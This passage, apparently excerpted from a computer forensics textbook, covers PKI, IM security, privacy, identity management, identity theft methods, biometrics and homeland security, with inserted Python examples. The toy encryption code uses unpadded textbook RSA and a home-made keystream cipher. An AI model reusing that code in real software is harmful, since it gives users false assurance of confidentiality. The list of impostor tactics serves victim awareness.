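    Symmetric, so the same call both encrypts and decrypts."""
    out = bytearray()
    for block, start in enumerate(range(0, len(data), 32)):
        ks = hashlib.sha256(key + block.to_bytes(8, "big")).digest()
        out.extend(a ^ b for a, b in zip(data[start:start + 32], ks))
    return bytes(out)

def encrypt(message, recipient_public):
    """Fresh random 128-bit session key for this message only; message under the
    symmetric cipher; session key under the recipient's public key, prepended."""
    n, e = recipient_public
    session_key = os.urandom(16)
    wrapped = pow(int.from_bytes(session_key, "big"), e, n)
    return wrapped.to_bytes((n.bit_length() + 7) // 8, "big") + _keystream_xor(session_key, message)

def decrypt(blob, recipient_private):
    """Split off the wrapped key, unwrap it with the private key, decrypt the rest."""
    n, d = recipient_private
    key_len = (n.bit_length() + 7) // 8
    session_key = pow(int.from_bytes(blob[:key_len], "big"), d, n).to_bytes(16, "big")
    return _keystream_xor(session_key, blob[key_len:])

def _cert_bytes(public, user_id):
    """Canonical bytes a certificate signature covers: the public key and the user ID."""
    return f"{public[0]}:{public[1]}:{user_id}".encode()

def make_certificate(subject_public, user_id, signer_private):
    """Public key + user ID + a signature over both, made with the signer's private key."""
    sig = sign(_cert_bytes(subject_public, user_id), signer_private)
    return {"public": subject_public, "user_id": user_id, "signatures": [sig]}

def certificate_valid(cert, signer_public):
    """True only if a signature verifies over the key and user ID as they now stand;
    an impostor's self-published key carries no signature a trusted signer made."""
    data = _cert_bytes(cert["public"], cert["user_id"])
    return any(verify(data, s, signer_public) for s in cert["signatures"])

if __name__ == "__main__":
    lisa_pub, lisa_priv = rsa_keygen()
    jeremiah_pub, jeremiah_priv = rsa_keygen()
    msg = b"Constructed sample: ship 500 units at the quoted price."  # constructed input
    blob = encrypt(msg, jeremiah_pub)   # confidentiality: only Jeremiah can unwrap the key
    sig = sign(msg, lisa_priv)          # authenticity and integrity: only Lisa could sign
    recovered = decrypt(blob, jeremiah_priv)
    print(recovered == msg, verify(recovered, sig, lisa_pub), verify(recovered + b"!", sig, lisa_pub))
```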
In fact, it is the public key certificate that makes distributed security applications using public keys practical
...
Whether
the Internet or satellite communications become more secure depends entirely upon
the vendors who sell the systems and the organizations that buy them
...
To begin addressing this challenge, IT managers need to
Get to know the key emerging vendors in this field
Begin learning about how public key cryptography is being woven into the soft
infrastructure of the Internet and satellite communications—and by extension, into intranets as well
Prepare to respond to business requirements for detailed, real-time measurement and reporting of document usage within the organization, as well as the
use by outsiders of documents created within the organization
Spend quality time with business unit managers, educating them on these new
technologies and brainstorming applications that make use of them
This section provided a brief overview of the current satellite encryption policies, the threat from the Internet, encrypted satellite data transmitting (downlink)
and receiving (uplink), and encryption cracking
...
INSTANT MESSAGING (IM) SECURITY SYSTEMS
The security threats from IM are straightforward
...
With the public IM networks, the individual employee registers for service
...
Furthermore, without additional tools, the company has no way of archiving IM messages
for legal or regulatory purposes, or of monitoring and controlling the content of messages to filter for inappropriate communications
...
Each
of the IM networks uses a well-known port that must either be left open on the corporate firewall to allow traffic in or closed, which, at least in theory, bans that service
to end users
...
One downside to this strategy is that because workers find IM useful, blocking it isn’t popular or necessarily even a good
business move
...
If the IM port has been
blocked, all the popular clients today are designed to fall back to port 80, the Web
port, and that’s usually open
...
Given IM’s pervasiveness, enterprises can’t think about security in a vacuum; it
has to be part of a larger management structure
...
Products also can examine
message content much like existing email spam filters
...
Besides addressing
security, this architecture puts the IM management and security vendors in a position
to deal with the pesky problem of the lack of interoperability among networks
...
Vendor representatives are surprisingly open about
their reasons: IM as a stand-alone application gets commoditized pretty quickly
...
NET PRIVACY SYSTEMS
The philosophical focus of a privacy management perspective is geared toward the
improvement of the bottom line for private companies and cost control and resource optimization for nonprofit and government organizations
...
Although this balance is essential in an information intensive world, it is clear that it is not going to be easy for organizations to achieve
the balance between privacy and the optimization of resources
...
Privacy protection for the individual was born with democracy and was originally designed to keep oppressive
governments from intruding on individual freedoms
...
People still have
every reason to keep a tight rein on snoopy governments (like the use of the Patriot Act), but now they must also be concerned about the commercial violation of
individual privacy rights and desires
...
This has raised considerable concern
among privacy advocates
...
Most for-profit companies, government agencies at all
levels, and even nonprofit organizations collect large amounts of information about
the people they serve or seek to serve
...
Managing Privacy Is the Business Challenge of the 21st Century
Protecting the privacy of enterprise information, data on customers, and corporate
trade secrets has become a major concern for managers in all types and sizes of organizations
...
Surviving the chaos surrounding information
privacy requires a comprehensive company-wide privacy plan
...
It is not likely that this debate will end anytime
soon
...
The Internet has compounded the difficulties enterprises face
in managing privacy efforts
...
Industry analysts project that by 2008, there will be approximately one billion Internet users worldwide
...
First, the Internet has resulted in a huge increase in the number of people
using computers to seek information and make purchases
...
Notably, in late
1999 and early 2000, Web technology that tracks how people use the Internet came
under fire
...
They range from small new Web-based companies to
large enterprises that started using the Internet for marketing, sales, or information
dissemination
...
The combination of these trends sets the
stage for potential privacy conflicts
...
The global nature of technology usage and thus international information exchanges, whether
they are voluntary, a result of technology architectures, or stem from out-and-out
deception, puts governments and international organizations in adversarial positions
...
Beyond the commercial use of the Internet, global competition has contributed
to a wave of industrial spying and the theft of trade secrets
...
The
Internet plays a role in this process by enabling people to move information around
the world faster and to provide low cost communications methods for information
theft rings
...
In the information-intensive environment of the 21st century, politics is of
course a factor
...
The Internet,
privacy, and consumer rights have historically been separate issues, but the dynamics of capitalism and cultural conflicts over privacy have fired rhetoric from
Washington, D.C., to San Francisco to Manila to Stockholm and around the world
...
These
issues also become content for the plethora of television news shows and pop culture news magazines
...
Politicians know
they must promise goodness, salvation, and protection of the family, community,
and country
...
In addition to their ineptness in the face of complex issues, politicians have a
fear of going against major trends
...
To be politically correct one must agree that this is a great revolution and that it is something
that will make economies stronger and the world a better place
...
The issue of protecting children and their privacy on the Internet has become a permanent part of the political process
...
According to industry analysts, by 2008 there will be over 130 million people under the age of 18
using the Internet
...
On the other hand, politicians prefer to avoid issues that are complex or that
require them to apply critical analysis to develop long-term solutions to major societal problems
...
This was painfully demonstrated by the
passage of the Communications Decency Act (CDA), which was rapidly ruled unconstitutional by the U.S. District Court
...
Another example of quickly shifting government positions is the
Federal Trade Commission (FTC) first being reluctant to push for greater privacy
protection and then in late spring of 2000 making an about face and taking the position that Congress should pass new legislation
...
For that reason,
having a comprehensive corporate privacy plan is of the utmost importance
...
This is important because organizations are becoming more dependent on information systems to manage critical financial data as well as customer records and product data
...
This author’s position on privacy is very straightforward
...
Also, this author’s view of privacy management is that it needs to be comprehensive and enterprise-wide
...
This includes but is not
limited to the IT department, legal counsel, customer relations, public relations,
product development, manufacturing, and the accounting or financial management department
...
In addition, the implementation and effectiveness of the privacy plan needs to be evaluated on an ongoing basis
...
This is done by giving you basic building blocks to understand the process
of developing, implementing, and monitoring privacy plans, policies, and procedures
...
IDENTITY MANAGEMENT SECURITY SYSTEMS
Identity management is the creation, management, and use of online, or digital, identities
...
Many such applications and interfaces require a unique user name, and as
a result, an individual typically possesses not one but several digital identities
...
An employee moving from one part of an organization to another—or being promoted to a higher management level—may
need to have updated access rights and other information attached to his or her digital identity
...
It is
not simply the ability to store or provision digital identities
...
Ultimately, identity management will help organizations do business and get
things done
...
Users will enjoy a
more convenient experience, and organizations will benefit from more efficient
processes and expanded business opportunities
...
Identity management will help organizations control access to enterprise systems and resources, facilitate efficient
and secure collaboration and commerce with business partners, and provide the
level of trust, convenience, and reliability needed to grow e-business revenues and
enhance profitability
...
The Challenges of Managing Digital Identities
The recent convergence of three events has created a sense of urgency around identity management
...
Aggregation
There is an incalculable amount of content on the Internet
...
In the process of providing more content and services, these aggregators have
developed relationships with users—including capturing their online identities
...
In an enterprise environment, this provides valuable tracking of information; for Web sites, each captured identity is an asset they can
leverage for their own—and their business partners’—marketing purposes
...
Examples of Web services currently prevalent on the Internet include calendaring, supply chain management, customer
relationship management, order fulfillment, sales force automation, music on
demand, and instant messaging
...
Consumers find Web services convenient and
cost-effective because they don’t need to go to a physical store and then purchase
and install software, and updates can be downloaded from the Internet
...
However, it is a significant challenge to verify a user’s identity and mitigate the
risk associated with providing high-value or sensitive services in an online business-to-business (B2B) or business-to-consumer (B2C) environment
...
A company can trust an employee’s identity more than that
of an external partner or customer because the company has more control over the
provisioning and maintenance of the employee’s identity
...
Online Partnerships
Many businesses are forging online partnerships with organizations that offer complementary services, both internally (to improve productivity) and externally (to expand their customer reach)
...
A B2C example would
be an airline that enables customers who have already logged in to its Web site to access hotel, rental car, and other services online
...
User Concerns and Business Issues
Beyond these three convergent events, there exist real concerns among the two audiences that would ultimately benefit from an identity management system: users
(employees, partners, and customers) and e-businesses
...
The challenges
that exist are making enterprise resources costly to manage and vulnerable to attack
and are impeding the growth of e-business because they create fear in consumers
and constrain the ability of businesses to operationalize their business models
...
Recently, industry analysts conducted a study
in which users were asked what they found most bothersome about the Internet
...
These
three issues are relevant to both consumer and business users, relate very strongly to
identity, and must be paramount in the design of any identity management system
...
The two most prevalent targets of
fraud were both Internet-based: online auctions and Internet service provider (ISPs)
...
Identity fraud (which will be discussed in detail later in the chapter) affects
users negatively in both home and work environments
...
On the enterprise side, if someone
132
Computer Forensics, Second Edition
uses another identity to obtain and release proprietary information, that usage
could be tracked and the innocent employee could be blamed—and probably
fired—for something he or she didn’t do
...
Convenience
The point of security systems is to make it extremely inconvenient for unauthorized
users to gain access
...
Mindful that consumer and business users want convenience, many Web
browsers support password caching
...
Of course,
this means that anyone who sits down at that person’s computer can log on and illegally use an already authorized identity
...
If a single,
shared online identity that eliminates the need for multiple registrations and passwords represents convenience in an identity management system, then that system
must add strong security via authentication technologies (such as digital certificate-based smart cards, tokens, and biometrics) as well as fine-grained authorization
through access management technologies
...
Privacy
A key benefit of an identity management system is that a single user identity can be used
across multiple Web sites and electronic resources
...
For one thing, it would be possible for someone to
track which Web sites, applications, or databases a user had accessed, which could be interpreted as a violation of privacy
...
Any identity management system must adequately protect sensitive user information and adhere to the four key elements of a privacy policy:
Notice: Users receive prior notification of information practices
...
Access: Users have the ability to access their personal information
...
Business Issues: Trust, Control, and Accountability
In addition to these user concerns, there are three primary business issues that
must be addressed by an identity management system: trust, control, and accountability
...
Trust via Authentication
Consider an employee collaboratively developing a product in a virtual environment with a business partner
...
An identity management solution would enable the user to access these
varied distributed resources with single sign-on convenience—but the system falls
apart if the business partner can’t trust the authentication process the original company used to approve its employee’s credential
...
Control via Access Management
Assuming the employee’s digital identity is trusted, policies should be applied to
control access to protected resources
...
Enforcement, then, ensures the effectiveness of online business processes
...
The employer and the business partner need to share this information to hold all parties accountable for the integrity of the system and the success of their partnership
...
Also, companies have been advised to perform their own vetting and authentication on customers and not rely on someone else’s prior approval
...
Approaches to Identity Management
To date, there have been three distinct approaches to developing an identity management system, each appropriate to different circumstances and requirements
...
As presented, they represent a conceptual and technological evolution from one-on-one and closed systems to more universal approaches that
seek to address the wide range of issues that have been discussed thus far
...
Silo
In a silo model, each business creates a unique relationship with its customers, employees, and partners through Internet, intranet, and extranet sites, respectively
...
The silo approach also has some significant drawbacks
...
For businesses, the silo model inhibits cross-selling opportunities; it is also expensive to
maintain—and burdensome to administer—multiple silos
...
An example would be any group of
companies, government agencies, or educational institutions that have banded together to serve a common user group or to establish an online B2B exchange
...
If a user wants to visit the Web site of a company outside the closed community—say, a competitor of one of the members—he or she would have to go to that
site separately
...
The disadvantages are
that users have a limited choice of companies to deal with and would be inconvenienced if they needed to belong to multiple communities or leave a community because a preferred vendor is not a member
...
Types of Computer Forensics Systems
135
Federated
In a federated model, each partner agrees to trust user identities issued or authenticated by other organizations while maintaining control of the identity and preference information of its own users
...
The federated model promises consolidated authentication capabilities across
distributed computing resources
...
For businesses, benefits include
greater efficiency and security; better services for employees, partners, and customers;
and new revenue opportunities
...
Overall, it appears that the federated model is emerging as the preferred next
step both for silo organizations looking to expand their reach and for closed communities seeking to connect with other communities on the Internet
...
An identity management solution is about intelligently using the identities that
have been created to do e-business
...
The vision
of identity management, therefore, incorporates a broader definition, a technology-neutral approach to integration and a flexible architecture that enables interoperability with multiple identity systems inside and outside organizations
...
User provisioning: Deploying digital identities and access rights based on business policies for employees, business partners, and customers must be done accurately and securely at the outset in order to reduce problems down the line
...
Authentication policy management: Once someone steals a user’s digital identity, the whole system becomes vulnerable
...
Authorization policy management: Authorization policies are designed to ensure that only appropriate resources can be accessed by a given digital identity
...
Centralized audit: Organizations need to track what users are doing and make
sure there are no blatant inconsistencies that indicate a problem
...
Integration: Putting the individual pieces together in a technology-neutral architecture enables sharing, ensures interoperability, and facilitates single sign-on capabilities
...
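The authorization policy management and centralized audit items above describe the checks an identity management system runs over what its users are actually doing. The following is an added example, not code from the book, showing one way to perform such an audit over authentication records collected from several federated partners. The directory, partner names, identities, cities and timestamps are all constructed for illustration, and the "implausible travel" window is an assumed value, not a figure from the text.

```python
"""Centralized audit across federated partners: look for blatant inconsistencies
in the authentication trail. Added example with constructed data; the partner
names, identities and events are invented, not from the book."""
from datetime import datetime, timedelta
from typing import Dict, List

# Identity directory: provisioning state plus the resources each identity may use
# (the authorization policy). Constructed.
DIRECTORY = {
    "jsmith": {"status": "active",   "allowed": {"hr-portal", "erp"}},
    "kdoe":   {"status": "disabled", "allowed": {"erp"}},   # deprovisioned last week
    "mlee":   {"status": "active",   "allowed": {"erp", "partner-catalog"}},
}

# Constructed audit records as forwarded by each partner's access manager.
EVENTS = [
    {"ts": "2003-05-12T09:01:00", "user": "jsmith", "partner": "acme",   "city": "Chicago", "resource": "erp"},
    {"ts": "2003-05-12T09:03:00", "user": "kdoe",   "partner": "acme",   "city": "Chicago", "resource": "erp"},
    {"ts": "2003-05-12T09:10:00", "user": "mlee",   "partner": "acme",   "city": "Denver",  "resource": "erp"},
    {"ts": "2003-05-12T09:20:00", "user": "mlee",   "partner": "globex", "city": "Boston",  "resource": "partner-catalog"},
    {"ts": "2003-05-12T09:30:00", "user": "jsmith", "partner": "globex", "city": "Chicago", "resource": "partner-catalog"},
]
TRAVEL_WINDOW = timedelta(hours=2)  # assumed: two different cities inside this window is implausible


def when(ev: Dict) -> datetime:
    """Parse the ISO timestamp each partner reports."""
    return datetime.fromisoformat(ev["ts"])


def audit(events: List[Dict], directory: Dict[str, Dict],
          window: timedelta = TRAVEL_WINDOW) -> List[Dict]:
    """Return one finding per inconsistency found in time order:
    - inactive-identity: a disabled or unknown identity authenticated somewhere
    - unauthorized-resource: an active identity reached a resource outside its policy
    - implausible-travel: the same identity was used from two cities within `window`"""
    findings: List[Dict] = []
    last_seen: Dict[str, Dict] = {}
    for ev in sorted(events, key=when):
        entry = directory.get(ev["user"])
        if entry is None or entry["status"] != "active":
            findings.append({"type": "inactive-identity", **ev})
        elif ev["resource"] not in entry["allowed"]:
            findings.append({"type": "unauthorized-resource", **ev})
        prev = last_seen.get(ev["user"])
        if prev and prev["city"] != ev["city"] and when(ev) - when(prev) <= window:
            findings.append({"type": "implausible-travel", "user": ev["user"],
                             "from": prev["city"], "to": ev["city"],
                             "partners": (prev["partner"], ev["partner"])})
        last_seen[ev["user"]] = ev
    return findings


if __name__ == "__main__":
    for finding in audit(EVENTS, DIRECTORY):
        print(finding)
```

Run against the constructed records, the audit reports the disabled identity kdoe still authenticating, mlee appearing in Denver and Boston ten minutes apart, and jsmith reaching a partner resource outside the directory's policy. The point of pulling every partner's records into one place is exactly this: none of the three inconsistencies is visible from a single partner's log on its own.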
A single federated identity enables a user to be authenticated from all
other partners in the model
...
Further, they need to manage and control authorized identities to ensure they are current and are being used in accordance with established policies
...
The challenges that have brought the issue of identity management to the fore will only grow and exacerbate the problems that have
stunted the growth of e-business and contributed to information security breaches
around the world
...
A federated approach will bring substantial benefits to users
and businesses alike
...
IDENTITY THEFT
Quite simply, identity theft is the appropriation of an individual’s personal information in order to impersonate that person in a legal sense
...
Identity theft is not new
...
There was a time
when an individual could flee his or her life, town, and mistakes and go somewhere
far away pretending to be someone else—and, no one knew better
...
Those were the days before
credit reporting and high-tech methods of tracking and sharing information were
commonplace
...
However it is done,
whether the identity thief uses high- or low-tech means of getting your personal information, an individual can become someone else very easily
...
An individual’s life can be devastated by the loss of good name
and the financial or personal mess that results
...
Thieves could be roommates, relatives, friends, estranged spouses,
or household workers—with ready access to their victims’ personal papers
...
The thief’s
motive is to gain goods and services at someone else’s expense
...
Who
is going to apprehend him? Occasionally law enforcement agencies, including the Secret Service, bust up identity theft crime rings that involve many victims and millions
of dollars, but they don’t chase down single crooks that commit victimless crimes
...
This could be individual hackers out to get
what they can or highly sophisticated crime rings that make a business out of fraud
...
You may do any of a hundred
little things each of us does every day that involve someone knowing who we are
...
Those who make a profession of stealing identities give it a great
deal of thought, indeed
...
The following are some of the ways imposters can get and use your personal information and take over your identity:
They steal wallets and purses containing your identification and credit and
bank cards
...
They complete a change of address form to divert your mail to another location
...
They fraudulently obtain your credit report by posing as a landlord, employer,
or someone else who may have a legitimate need for (and a legal right to) the
information
...
They find personal information in your home
...
They buy your personal information from “inside” sources
...
They call your credit card issuer and, pretending to be you, ask to change the
mailing address on your credit card account
...
Because your bills are being sent to the new address,
it may take some time before you realize there’s a problem
...
When they use the credit card and don’t pay the bills, the
delinquent account is reported on your credit report
...
They open a bank account in your name and write bad checks on that account
...
They counterfeit checks or debit cards and drain your bank account
...
How Your Personal Information Can Be Used Against You
Once the thief has basic information about you, there are a number of ways it can be
used
...
It is
then a simple matter to call the financial institution and request a change of mailing
address
...
You don’t realize what’s
happening for a while because you haven’t gotten a bill
...
An identity thief who has enough information about you can open a new credit
card account in your name
...
The balance on your new account by
that time could be devastating—not to mention that the late payments have been
reported to the credit bureau
...
Huge long distance and service bills can be
charged to you because now the identity thief is getting the bill—not you
...
The end result is the same as with
a phony credit card—you are left with a monstrous bill and your delinquency is reported to the credit bureau
...
In other words, an identity thief can
hurt you by opening a bank account in your name, possibly with a cash advance
from your bogus credit card, and then write bad checks against that account as
often as possible before the bank reports your felonious conduct
...
If the thief is good enough, he or she
gets the goods and you get the bill
...
This would prevent the thief from having to pay debts incurred in your
name
...
Never forget the thief who has a personal agenda to
cause you harm—what could be better than bankruptcy?
These are just some of the ways that the theft of your identity can wreak havoc
in your life, and thinking about them is enough to scare the daylights out of you
...
Once the thieves have some of your personal information, they can start applying for credit cards in your name—giving an address that is often different from
yours
...
A lot
of credit granters do not check records
...
Identity thieves may buy a car or rent an apartment in your name
...
For example, in one case, the impostor was a
major drug dealer using the identity of a highly ranked corporate executive
...
Still, cops recently broke into the man’s house and into his
bedroom with guns drawn
...
Some have had their telephone service disconnected and their driver’s licenses suspended or been harassed by collection agencies
...
Although the FTC does not have the authority to bring criminal cases, they
can help victims of identity theft by providing information to assist them in resolving
the financial and other problems that can result from this crime
...
If you’ve been a victim of identity theft, file a complaint with the FTC by contacting their Identity Theft Hotline by telephone: toll-free 1-877-IDTHEFT (4384338); TDD: 202-326-2502; by mail: Identity Theft Clearinghouse, Federal Trade
Commission, 600 Pennsylvania Avenue, NW, Washington, DC 20580; or online:
http://www
...
gov/idtheft
...
If
specific institutions and companies are not responsive to your questions and complaints, you also may want to contact the government agencies with jurisdiction
over those companies
...
In 1998, when Congress made identity theft a federal crime,
it directed the FTC to establish a clearinghouse for identity-theft complaints and assistance
...
The Secret Service, for example, says
victims and institutions in its identity-fraud investigations lost $4.78 billion in 2000
...
Consumers don’t have to call the FTC and
the Secret Service and the FBI
...
Therefore, it is expected that there will be a significant increase in the
number of federal prosecutions
...
That leaves many cases in the
hands of local police
...
All the police can do in most instances is file a police report, but that still helps
...
Although there are many variations in how specific products and systems work, there
are a number of common processing elements
...
One essential difference between the various techniques is the characteristic (body part or
function) being analyzed
...
All
biometric systems have some sort of collection mechanism
...
In order to “enroll” in a system, an individual presents his “live” biometric a
number of times so the system can build a composition or profile of his characteristic, allowing for slight variations (different degrees of pressure when he places his
finger on the reader)
...
Extraction
Commercially available biometric devices generally do not record full images of
biometrics the way law enforcement agencies collect actual fingerprints
...
Only certain attributes are collected (particular measurements of a fingerprint or pressure points of a signature)
...
This extracted information, sometimes called “raw data,” is converted into a
mathematical code
...
This code is then stored as a “sample” or “template.”
...
Regardless of the variations, all biometric systems must create and retain a
template of the biometric in order to recognize or verify the individual
...
Comparison and Matching
To use a biometric system, the specific features of a person’s biometric characteristic are measured and captured each time he presents his “live” biometric
...
The new code created from the live scan is compared
against a central database of templates in the case of a one-to-many match, or to a
single stored template in the case of a one-to-one match
...
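The three steps above (enrollment from several live presentations, extraction of a few attributes into a code, and comparison of a fresh code against one template or against a whole database) can be shown end to end in a small model. What follows is an added example, not code from the book or from any biometric vendor: the four-number feature vectors are invented, the tolerance rule (three standard deviations per feature, with a floor) is an assumed simplification, and the names alice and bob are placeholders.

```python
"""Toy enroll / extract / compare pipeline for a biometric system.
Added example with constructed data: the feature values below are invented,
not the output of any real fingerprint or signature reader, and the matching
rule is a simple per-feature tolerance, not a vendor's algorithm."""
from statistics import mean, pstdev
from typing import Dict, List, Optional, Sequence

Template = Dict[str, List[float]]

# Constructed enrollment presentations: each reading is the short vector of
# attributes the reader extracts (e.g. ridge count, core-to-delta distance,
# loop width, pressure). Each user presents the "live" biometric three times.
ENROLL_READINGS = {
    "alice": [[30.0, 12.1, 0.52, 7.9], [30.4, 11.8, 0.55, 8.1], [29.7, 12.3, 0.50, 8.0]],
    "bob":   [[25.1, 15.0, 0.71, 6.2], [24.8, 15.4, 0.69, 6.0], [25.3, 14.9, 0.70, 6.1]],
}
MIN_TOLERANCE = 0.05    # floor so a very consistent enrollment still tolerates small drift
TOLERANCE_SIGMAS = 3.0  # accept a live reading within 3 standard deviations per feature


def extract(raw_reading: Sequence[float]) -> List[float]:
    """Extraction: keep only the attributes the system uses, at the reader's
    resolution. The full image is never stored, only this code."""
    return [round(float(v), 2) for v in raw_reading]


def enroll(readings: List[Sequence[float]]) -> Template:
    """Enrollment: combine several presentations into one template, the
    per-feature mean plus a tolerance derived from the variation seen."""
    codes = [extract(r) for r in readings]
    n_features = len(codes[0])
    means = [mean([c[i] for c in codes]) for i in range(n_features)]
    tols = [max(MIN_TOLERANCE, TOLERANCE_SIGMAS * pstdev([c[i] for c in codes]))
            for i in range(n_features)]
    return {"mean": means, "tol": tols}


def score(template: Template, live: Sequence[float]) -> float:
    """Normalised distance between a live code and a template:
    0.0 means identical to the enrolled mean, 1.0 means at the edge of tolerance."""
    code = extract(live)
    return max(abs(c - m) / t for c, m, t in zip(code, template["mean"], template["tol"]))


def verify(template: Template, live: Sequence[float], threshold: float = 1.0) -> bool:
    """One-to-one match: does the live reading belong to the claimed identity?"""
    return score(template, live) <= threshold


def identify(db: Dict[str, Template], live: Sequence[float],
             threshold: float = 1.0) -> Optional[str]:
    """One-to-many match: search every stored template and return the closest
    identity, or None if nothing falls within tolerance."""
    if not db:
        return None
    best = min(db, key=lambda uid: score(db[uid], live))
    return best if verify(db[best], live, threshold) else None


# The template store: only derived codes are kept, never the raw presentations.
TEMPLATE_DB: Dict[str, Template] = {uid: enroll(r) for uid, r in ENROLL_READINGS.items()}

if __name__ == "__main__":
    live_alice = [30.2, 12.0, 0.53, 8.0]   # constructed later presentation by alice
    stranger = [27.0, 13.5, 0.60, 7.0]     # constructed presentation by an unenrolled person
    print("1:1 alice claims alice:", verify(TEMPLATE_DB["alice"], live_alice))
    print("1:1 alice claims bob:  ", verify(TEMPLATE_DB["bob"], live_alice))
    print("1:N alice:", identify(TEMPLATE_DB, live_alice))
    print("1:N stranger:", identify(TEMPLATE_DB, stranger))
```

Two things the model makes visible that the prose only states: the template is a derived code, so the store holds means and tolerances rather than anything resembling the original biometric, and the tolerance learned during enrollment is what lets a slightly different later presentation (a firmer press, a small shift) still verify while an unenrolled person is rejected by both the one-to-one and the one-to-many path.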
HOMELAND SECURITY SYSTEMS
Since 2000, terms such as “homeland security” and “homeland defense” have been
widely used to describe America’s response to the information warfare (IW) waged
by terrorists (IW will be discussed in greater detail in Chapters 13 through 19)
...
Homeland Security Defined
The terms homeland security and homeland defense have received increased attention since the tragic events of September 11, 2001
...
Homeland security is defined as the deterrence, prevention, and preemption of and defense against aggression targeted at
U.S. territory, sovereignty, population, and infrastructure as well as the management of the consequences of such aggression and other domestic emergencies
...
It is defined
as the deterrence, prevention, and preemption of and defense against direct attacks
aimed at U.S. territory, population, and infrastructure
...
Nevertheless, the homeland security space is still being defined
...
Homeland Security Today
In November 2002, President Bush signed the Homeland Security Act of 2002, creating the Department of Homeland Security
...
This is the most significant transformation of the U.S. government in over a
half century
...
The Department of Homeland
Security has the following organizational structure:
Border and transportation security
Emergency preparedness and response
Chemical, biological, radiological, and nuclear countermeasures
Information analysis and infrastructure protection
Emergency managers had been pleased with Bush’s previous attention to emergency management
...
Now, emergency managers are concerned, as FEMA has been
swallowed up in a new organization with a broader mission
...
The first line of homeland defense in any emergency is the “first responders”—
local police, firefighters, and emergency medical professionals
...
Emergency management and health care capabilities are a critical second tier
to the first responders
...
Homeland security initiatives will likely focus on improving our capability to respond to a terrorist attack
...
This is the part of homeland security
where first responders and emergency managers play a vital role
...
Emergency managers have been providing homeland security and
homeland defense services for decades
...
Today, comprehensive emergency management, homeland security, and terrorism preparedness are included in
an all-hazards comprehensive emergency management program (CEMP)
...
How Comprehensive Emergency Management Addresses Homeland Security
Finally, a CEMP is an overarching process that includes mitigation, preparedness,
response, and recovery
...
Sound emergency management practices are required to mitigate the impact of
day-to-day disruptions as well as managing response to and recovery from terrorist attacks and other disasters
...
These expectations are being made against a backdrop of external threats
that have grown in both number and sophistication, internal threats that could involve terrorist and organized crime, and a rapid growth in the number and type of
threat data sources
...
The latter also creates challenges within an organization’s personnel structure since an integrated security system now requires IT
and non-IT data inputs that extend far beyond the traditional scope of IT
...
At the same time,
most enterprises are facing a difficult economic environment with infrastructure
capital and operating costs allowing minimal (if any) increases in expenditure
...
Just as enterprise resource planning (ERP) systems
provide enterprise management with financial reporting metrics that are increasingly “real-time,” there is a demand that security systems quickly deliver relevant
information to enable a speedy reaction to a broad range of threats
...
It typically involved a small number of devices and log files
...
” In parallel, the September
11 terrorist attack on New York’s World Trade Center led to growing demands for
improved correlation between widely disparate data sources
...
Implementation of sophisticated capture and computer forensics analysis systems is
already underway to meet the goals of the homeland security strategy
...
The traditional distinctions between incident
response and forensic tools are blurring because of the growing expectations put
upon security tools
...
Thus, this chapter analyzed how computer forensics
technologies can be extended to address the future requirements of IT security and
computer forensics systems
...
The following conclusions are not exhaustive, nor
is the order significant
...
Intrusion detection systems help computer systems prepare for and deal with
attacks
...
Storage area network security systems offer the most promising solutions for
secure storage problems today, complementing the other solutions of direct
storage, centralized storage, and network-attached storage
...
PKI security systems assume the use of public key cryptography, which is the
most common method on the Internet for authentication of a message sender
or encryption of a message
...
Governments and organizations around the world can use satellite encryption
security systems to help preserve vital national secrets, limit attacks on a nation’s information infrastructure, and eliminate security and authentication
obstacles to electronic commerce
...
All types of organizations need to develop net privacy policies that maximize
the benefit of reusing information in as many ways as possible while minimizing the risks associated with potential privacy violations
...
In today’s environment, it is next to impossible to stop a determined identity thief
...
Homeland security systems encompass policies, actions, and structures designed to protect the rights and freedoms inherent in the U.S. Constitution
...
An Agenda for Action
When completing the Forensics Systems Types Checklist (Table F3
...
The order is not significant; however, these are the activities for which the researcher would want to
provide a detailed description of procedures, review, and assessment for ease of use
and admissibility
...
Finally, let’s move on to the real interactive part of this chapter: review questions/exercises, hands-on projects, case projects, and optional team case project
...
CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...
2
...
3
...
4
...
5
...
Multiple Choice
1
...
High-level management policy statement
B
...
Examination of risks
D
...
Developing an implementation strategy
2
...
Stored value card: minimizes the need to carry cash, can be used to purchase items from merchants, vending machines, and pay phones
B
...
Access control in offices and hotels: allows storage of time entered and exited, access conditions, and identity
D
...
Contact tickets for ski resorts and airlines: increases speed, convenience,
and security and facilitates baggage checking
3
...
Monitoring and analysis of user and system activity
B
...
Auditing of system configurations and vulnerabilities
D
...
Recognition of activity patterns reflecting known attacks
4
...
This
is a valuable function and would be sufficient protection were it not for the following facts, except two:
A
...
B
...
C
...
D
...
E
...
5
...
Many of these attacks are directed through the
Internet
...
Persons who see attacking a corporation’s information system as a technological challenge
B
...
Persons who investigate to avoid the possibility of incurring legal action
against themselves or the organization for whom they are reviewing the investigation
D
...
Persons associated with a corporate competitor or political adversary who
see the corporation’s information system as a legitimate strategic target
Exercise
Larry deposits a stolen third-party check into his account
...
Subsequently an ATM camera records Larry making a cash withdrawal
...
How would your forensic system continue to handle this analysis?
HANDS-ON PROJECTS
At 9:36 A.M. William swipes his access card to level 20 and enters the secure staff
area
...
The system checks the company calendar and detects that Bill,
a member of the organization’s merger and acquisition unit, is scheduled for an offsite training course and is not expected in the building at all that day
...
The system review of related video log files confirms the same unidentified person
leaving level 20 at 9:54 A.M. and leaving level 36 at 10:50 A.M.
At this point, how
would the company’s computer forensics team go about investigating this case?
Case Project
Karin enters a bank branch in the Chicago area and deposits a check for her
brother
...
The image is time and date
stamped
...
During a routine correlation of data, the
apparent discrepancy is detected by the bank’s forensics system
...
Please explain your solution in detail regarding the
organization’s computer forensic technology team’s investigation into this matter
...
[2] “Online Payment Processing: What You Need to Know,” © 2003 VeriSign,
Inc
...
VeriSign Worldwide Headquarters, 487 East Middlefield Road, Mountain View, CA 94043, 2003
...
4 Vendor and Computer Forensics Services
Cyber crime costs U.S. businesses millions, if not billions, of dollars in unrealized profits and exposes organizations to significant risk
...
In 2003, the Computer Emergency Response Team (CERT) reported a
sevenfold increase in the number of computer security incidents reported in 2002
...
When cyber crime strikes, the issue is not the incident itself, but how the organization responds to the attack
...
In addition, this chapter covers the following computer forensic services:
Forensic incident response
Evidence collection
Forensic analysis
Expert witness
Forensic litigation and insurance claims support
Training
Forensic process improvement
OCCURRENCE OF CYBER CRIME
Cyber crime occurs when information technology is used to commit or conceal an
offense
...
Typically,
